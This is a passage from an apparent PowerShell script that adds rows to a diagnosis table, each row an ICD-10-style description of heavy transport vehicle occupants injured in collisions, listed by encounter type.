or alighting a heavy transport vehicle injured in collision with pedestrian or animal","Person boarding or alighting a heavy transport vehicle injured in collision with pedestrian or animal, sequela") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with pedestrian or animal in traffic accident","Driver of heavy transport vehicle injured in collision with pedestrian or animal in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with pedestrian or animal in traffic accident","Driver of heavy transport vehicle injured in collision with pedestrian or animal in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with pedestrian or animal in traffic accident","Driver of heavy transport vehicle injured in collision with pedestrian or animal in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with pedestrian or animal in traffic accident","Passenger in heavy transport vehicle injured in collision with pedestrian or animal in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with pedestrian or animal in traffic accident","Passenger in heavy transport vehicle injured in collision with pedestrian or animal in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with pedestrian or animal in traffic accident","Passenger in heavy transport vehicle injured in collision with pedestrian or animal in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in collision with pedestrian or animal in traffic accident","Person on outside of heavy transport vehicle injured in collision with pedestrian or animal in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in collision with pedestrian or animal in traffic accident","Person on outside of heavy transport vehicle injured in collision with pedestrian or animal in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in collision with pedestrian or animal in traffic accident","Person on outside of heavy transport vehicle injured in collision with pedestrian or animal in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with pedestrian or animal in traffic accident","Unspecified occupant of heavy transport vehicle injured in collision with pedestrian or animal in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with pedestrian or animal in traffic accident","Unspecified occupant of heavy transport vehicle injured in collision with pedestrian or animal in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with pedestrian or animal in traffic accident","Unspecified occupant of heavy transport vehicle injured in collision with pedestrian or animal in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with pedal cycle in nontraffic accident","Driver of heavy transport vehicle injured in collision with pedal cycle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with pedal cycle in nontraffic accident","Driver of heavy transport vehicle injured in collision with pedal cycle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with pedal cycle in nontraffic accident","Driver of heavy transport vehicle injured in collision with pedal cycle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with pedal cycle in nontraffic accident","Passenger in heavy transport vehicle injured in collision with pedal cycle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with pedal cycle in nontraffic accident","Passenger in heavy transport vehicle injured in collision with pedal cycle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with pedal cycle in nontraffic accident","Passenger in heavy transport vehicle injured in collision with pedal cycle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in collision with pedal cycle in nontraffic accident","Person on outside of heavy transport vehicle injured in collision with pedal cycle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in collision with pedal cycle in nontraffic accident","Person on outside of heavy transport vehicle injured in collision with pedal cycle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in collision with pedal cycle in nontraffic accident","Person on outside of heavy transport vehicle injured in collision with pedal cycle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with pedal cycle in nontraffic accident","Unspecified occupant of heavy transport vehicle injured in collision with pedal cycle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with pedal cycle in nontraffic accident","Unspecified occupant of heavy transport vehicle injured in collision with pedal cycle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with pedal cycle in nontraffic accident","Unspecified occupant of heavy transport vehicle injured in collision with pedal cycle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a heavy transport vehicle injured in collision with pedal cycle while boarding or alighting","Person boarding or alighting a heavy transport vehicle injured in collision with pedal cycle while boarding or alighting, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a heavy transport vehicle injured in collision with pedal cycle while boarding or alighting","Person boarding or alighting a heavy transport vehicle injured in collision with pedal cycle while boarding or alighting, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a heavy transport vehicle injured in collision with pedal cycle while boarding or alighting","Person boarding or alighting a heavy transport vehicle injured in collision with pedal cycle while boarding or alighting, sequela") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with pedal cycle in traffic accident","Driver of heavy transport vehicle injured in collision with pedal cycle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with pedal cycle in traffic accident","Driver of heavy transport vehicle injured in collision with pedal cycle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with pedal cycle in traffic accident","Driver of heavy transport vehicle injured in collision with pedal cycle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with pedal cycle in traffic accident","Passenger in heavy transport vehicle injured in collision with pedal cycle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with pedal cycle in traffic accident","Passenger in heavy transport vehicle injured in collision with pedal cycle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with pedal cycle in traffic accident","Passenger in heavy transport vehicle injured in collision with pedal cycle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in collision with pedal cycle in traffic accident","Person on outside of heavy transport vehicle injured in collision with pedal cycle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in collision with pedal cycle in traffic accident","Person on outside of heavy transport vehicle injured in collision with pedal cycle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in collision with pedal cycle in traffic accident","Person on outside of heavy transport vehicle injured in collision with pedal cycle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with pedal cycle in traffic accident","Unspecified occupant of heavy transport vehicle injured in collision with pedal cycle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with pedal cycle in traffic accident","Unspecified occupant of heavy transport vehicle injured in collision with pedal cycle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with pedal cycle in traffic accident","Unspecified occupant of heavy transport vehicle injured in collision with pedal cycle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Driver of heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Driver of heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Driver of heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Passenger in heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Passenger in heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Passenger in heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Person on outside of heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Person on outside of heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Person on outside of heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Unspecified occupant of heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Unspecified occupant of heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Unspecified occupant of heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle","Person boarding or alighting a heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle","Person boarding or alighting a heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle","Person boarding or alighting a heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle in traffic accident","Driver of heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle in traffic accident","Driver of heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle in traffic accident","Driver of heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle in traffic accident","Passenger in heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle in traffic accident","Passenger in heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle in traffic accident","Passenger in heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle in traffic accident","Person on outside of heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle in traffic accident","Person on outside of heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle in traffic accident","Person on outside of heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle in traffic accident","Unspecified occupant of heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle in traffic accident","Unspecified occupant of heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle in traffic accident","Unspecified occupant of heavy transport vehicle injured in collision with two- or three-wheeled motor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with car, pick-up truck or van in nontraffic accident","Driver of heavy transport vehicle injured in collision with car, pick-up truck or van in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with car, pick-up truck or van in nontraffic accident","Driver of heavy transport vehicle injured in collision with car, pick-up truck or van in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with car, pick-up truck or van in nontraffic accident","Driver of heavy transport vehicle injured in collision with car, pick-up truck or van in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with car, pick-up truck or van in nontraffic accident","Passenger in heavy transport vehicle injured in collision with car, pick-up truck or van in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with car, pick-up truck or van in nontraffic accident","Passenger in heavy transport vehicle injured in collision with car, pick-up truck or van in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with car, pick-up truck or van in nontraffic accident","Passenger in heavy transport vehicle injured in collision with car, pick-up truck or van in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in collision with car, pick-up truck or van in nontraffic accident","Person on outside of heavy transport vehicle injured in collision with car, pick-up truck or van in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in collision with car, pick-up truck or van in nontraffic accident","Person on outside of heavy transport vehicle injured in collision with car, pick-up truck or van in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in collision with car, pick-up truck or van in nontraffic accident","Person on outside of heavy transport vehicle injured in collision with car, pick-up truck or van in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with car, pick-up truck or van in nontraffic accident","Unspecified occupant of heavy transport vehicle injured in collision with car, pick-up truck or van in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with car, pick-up truck or van in nontraffic accident","Unspecified occupant of heavy transport vehicle injured in collision with car, pick-up truck or van in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with car, pick-up truck or van in nontraffic accident","Unspecified occupant of heavy transport vehicle injured in collision with car, pick-up truck or van in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a heavy transport vehicle injured in collision with car, pick-up truck or van","Person boarding or alighting a heavy transport vehicle injured in collision with car, pick-up truck or van, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a heavy transport vehicle injured in collision with car, pick-up truck or van","Person boarding or alighting a heavy transport vehicle injured in collision with car, pick-up truck or van, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a heavy transport vehicle injured in collision with car, pick-up truck or van","Person boarding or alighting a heavy transport vehicle injured in collision with car, pick-up truck or van, sequela") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with car, pick-up truck or van in traffic accident","Driver of heavy transport vehicle injured in collision with car, pick-up truck or van in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with car, pick-up truck or van in traffic accident","Driver of heavy transport vehicle injured in collision with car, pick-up truck or van in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with car, pick-up truck or van in traffic accident","Driver of heavy transport vehicle injured in collision with car, pick-up truck or van in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with car, pick-up truck or van in traffic accident","Passenger in heavy transport vehicle injured in collision with car, pick-up truck or van in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with car, pick-up truck or van in traffic accident","Passenger in heavy transport vehicle injured in collision with car, pick-up truck or van in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with car, pick-up truck or van in traffic accident","Passenger in heavy transport vehicle injured in collision with car, pick-up truck or van in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in collision with car, pick-up truck or van in traffic accident","Person on outside of heavy transport vehicle injured in collision with car, pick-up truck or van in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in collision with car, pick-up truck or van in traffic accident","Person on outside of heavy transport vehicle injured in collision with car, pick-up truck or van in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in collision with car, pick-up truck or van in traffic accident","Person on outside of heavy transport vehicle injured in collision with car, pick-up truck or van in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with car, pick-up truck or van in traffic accident","Unspecified occupant of heavy transport vehicle injured in collision with car, pick-up truck or van in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with car, pick-up truck or van in traffic accident","Unspecified occupant of heavy transport vehicle injured in collision with car, pick-up truck or van in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with car, pick-up truck or van in traffic accident","Unspecified occupant of heavy transport vehicle injured in collision with car, pick-up truck or van in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with heavy transport vehicle or bus in nontraffic accident","Driver of heavy transport vehicle injured in collision with heavy transport vehicle or bus in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with heavy transport vehicle or bus in nontraffic accident","Driver of heavy transport vehicle injured in collision with heavy transport vehicle or bus in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with heavy transport vehicle or bus in nontraffic accident","Driver of heavy transport vehicle injured in collision with heavy transport vehicle or bus in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with heavy transport vehicle or bus in nontraffic accident","Passenger in heavy transport vehicle injured in collision with heavy transport vehicle or bus in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with heavy transport vehicle or bus in nontraffic accident","Passenger in heavy transport vehicle injured in collision with heavy transport vehicle or bus in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with heavy transport vehicle or bus in nontraffic accident","Passenger in heavy transport vehicle injured in collision with heavy transport vehicle or bus in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in collision with heavy transport vehicle or bus in nontraffic accident","Person on outside of heavy transport vehicle injured in collision with heavy transport vehicle or bus in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in collision with heavy transport vehicle or bus in nontraffic accident","Person on outside of heavy transport vehicle injured in collision with heavy transport vehicle or bus in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in collision with heavy transport vehicle or bus in nontraffic accident","Person on outside of heavy transport vehicle injured in collision with heavy transport vehicle or bus in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with heavy transport vehicle or bus in nontraffic accident","Unspecified occupant of heavy transport vehicle injured in collision with heavy transport vehicle or bus in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with heavy transport vehicle or bus in nontraffic accident","Unspecified occupant of heavy transport vehicle injured in collision with heavy transport vehicle or bus in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with heavy transport vehicle or bus in nontraffic accident","Unspecified occupant of heavy transport vehicle injured in collision with heavy transport vehicle or bus in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a heavy transport vehicle injured in collision with heavy transport vehicle or bus while boarding or alighting","Person boarding or alighting a heavy transport vehicle injured in collision with heavy transport vehicle or bus while boarding or alighting, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a heavy transport vehicle injured in collision with heavy transport vehicle or bus while boarding or alighting","Person boarding or alighting a heavy transport vehicle injured in collision with heavy transport vehicle or bus while boarding or alighting, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a heavy transport vehicle injured in collision with heavy transport vehicle or bus while boarding or alighting","Person boarding or alighting a heavy transport vehicle injured in collision with heavy transport vehicle or bus while boarding or alighting, sequela") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with heavy transport vehicle or bus in traffic accident","Driver of heavy transport vehicle injured in collision with heavy transport vehicle or bus in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with heavy transport vehicle or bus in traffic accident","Driver of heavy transport vehicle injured in collision with heavy transport vehicle or bus in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with heavy transport vehicle or bus in traffic accident","Driver of heavy transport vehicle injured in collision with heavy transport vehicle or bus in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with heavy transport vehicle or bus in traffic accident","Passenger in heavy transport vehicle injured in collision with heavy transport vehicle or bus in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with heavy transport vehicle or bus in traffic accident","Passenger in heavy transport vehicle injured in collision with heavy transport vehicle or bus in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with heavy transport vehicle or bus in traffic accident","Passenger in heavy transport vehicle injured in collision with heavy transport vehicle or bus in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in collision with heavy transport vehicle or bus in traffic accident","Person on outside of heavy transport vehicle injured in collision with heavy transport vehicle or bus in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in collision with heavy transport vehicle or bus in traffic accident","Person on outside of heavy transport vehicle injured in collision with heavy transport vehicle or bus in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in collision with heavy transport vehicle or bus in traffic accident","Person on outside of heavy transport vehicle injured in collision with heavy transport vehicle or bus in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with heavy transport vehicle or bus in traffic accident","Unspecified occupant of heavy transport vehicle injured in collision with heavy transport vehicle or bus in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with heavy transport vehicle or bus in traffic accident","Unspecified occupant of heavy transport vehicle injured in collision with heavy transport vehicle or bus in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with heavy transport vehicle or bus in traffic accident","Unspecified occupant of heavy transport vehicle injured in collision with heavy transport vehicle or bus in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with railway train or railway vehicle in nontraffic accident","Driver of heavy transport vehicle injured in collision with railway train or railway vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with railway train or railway vehicle in nontraffic accident","Driver of heavy transport vehicle injured in collision with railway train or railway vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with railway train or railway vehicle in nontraffic accident","Driver of heavy transport vehicle injured in collision with railway train or railway vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with railway train or railway vehicle in nontraffic accident","Passenger in heavy transport vehicle injured in collision with railway train or railway vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with railway train or railway vehicle in nontraffic accident","Passenger in heavy transport vehicle injured in collision with railway train or railway vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with railway train or railway vehicle in nontraffic accident","Passenger in heavy transport vehicle injured in collision with railway train or railway vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in collision with railway train or railway vehicle in nontraffic accident","Person on outside of heavy transport vehicle injured in collision with railway train or railway vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in collision with railway train or railway vehicle in nontraffic accident","Person on outside of heavy transport vehicle injured in collision with railway train or railway vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in collision with railway train or railway vehicle in nontraffic accident","Person on outside of heavy transport vehicle injured in collision with railway train or railway vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with railway train or railway vehicle in nontraffic accident","Unspecified occupant of heavy transport vehicle injured in collision with railway train or railway vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with railway train or railway vehicle in nontraffic accident","Unspecified occupant of heavy transport vehicle injured in collision with railway train or railway vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with railway train or railway vehicle in nontraffic accident","Unspecified occupant of heavy transport vehicle injured in collision with railway train or railway vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a heavy transport vehicle injured in collision with railway train or railway vehicle","Person boarding or alighting a heavy transport vehicle injured in collision with railway train or railway vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a heavy transport vehicle injured in collision with railway train or railway vehicle","Person boarding or alighting a heavy transport vehicle injured in collision with railway train or railway vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a heavy transport vehicle injured in collision with railway train or railway vehicle","Person boarding or alighting a heavy transport vehicle injured in collision with railway train or railway vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with railway train or railway vehicle in traffic accident","Driver of heavy transport vehicle injured in collision with railway train or railway vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with railway train or railway vehicle in traffic accident","Driver of heavy transport vehicle injured in collision with railway train or railway vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with railway train or railway vehicle in traffic accident","Driver of heavy transport vehicle injured in collision with railway train or railway vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with railway train or railway vehicle in traffic accident","Passenger in heavy transport vehicle injured in collision with railway train or railway vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with railway train or railway vehicle in traffic accident","Passenger in heavy transport vehicle injured in collision with railway train or railway vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with railway train or railway vehicle in traffic accident","Passenger in heavy transport vehicle injured in collision with railway train or railway vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in collision with railway train or railway vehicle in traffic accident","Person on outside of heavy transport vehicle injured in collision with railway train or railway vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in collision with railway train or railway vehicle in traffic accident","Person on outside of heavy transport vehicle injured in 